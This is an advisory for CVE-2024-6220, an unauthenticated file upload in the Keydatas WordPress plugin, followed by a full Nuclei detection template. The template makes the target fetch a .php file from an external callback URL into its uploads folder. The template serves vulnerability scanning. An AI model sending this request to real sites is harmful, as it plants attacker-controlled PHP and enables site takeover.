The Keydatas plugin for WordPress (known in Chinese as "简数采集器") is vulnerable to unrestricted file uploads due to missing file-type validation in the keydatas_downloadImages function in all versions up to and including 2.5.2. An unauthenticated attacker can upload arbitrary files to the server — potentially leading to remote code execution, site takeover, or other severe compromise.
PoC代码[已公开]
id: CVE-2024-6220
info:
name: WordPress Keydatas ≤ 2.5.2 - Arbitrary File Upload
author: hnd3884
severity: critical
description: |
The Keydatas plugin for WordPress (known in Chinese as "简数采集器") is vulnerable to unrestricted file uploads due to missing file-type validation in the keydatas_downloadImages function in all versions up to and including 2.5.2. An unauthenticated attacker can upload arbitrary files to the server — potentially leading to remote code execution, site takeover, or other severe compromise.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/keydatas/keydatas-252-unauthenticated-arbitrary-file-upload
- https://github.com/advisories/GHSA-29rm-j4cx-hmc5
- https://nvd.nist.gov/vuln/detail/CVE-2024-6220
classification:
cve-id: CVE-2024-6220
epss-score: 0.74673
epss-percentile: 0.98802
cwe-id: CWE-434
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cpe: cpe:2.3:a:keydatas:keydatas:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: keydatas
product: wordpress
tags: cve,cve2024,wp,wp-plugin,wordpress,keydatas,file-upload,rce,vkev
variables:
filename: "{{rand_base(5)}}.php"
oast_url: "{{interactsh-url}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /?__kds_flag=post HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
kds_password=keydatas.com&post_title=1&__kds_docImgs=http://{{oast_url}}/{{filename}}&__kds_download_imgs_flag=true
matchers:
- type: dsl
dsl:
- "status_code == 200"
- 'contains(body, "{\"rs\":1")'
condition: and
internal: true
extractors:
- type: regex
part: http_1_request
name: folder
group: 1
regex:
- '__kds_docImgs=http://([^&]+?\.php)'
internal: true
- raw:
- |
GET /wp-content/uploads/{{folder}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "<html><head></head><body>"
- type: status
status:
- 200
# digest: 4b0a00483046022100e3c97f482436648ef3c9e134ae6815eaaff2816ca5f3f473e4860baa0a630779022100882a74ebfd7ed9f8d56bab040b9b3156bc2d1fcd53291e224f6330dc9d52c6e7:922c64590222798bb761d5b6d8e72950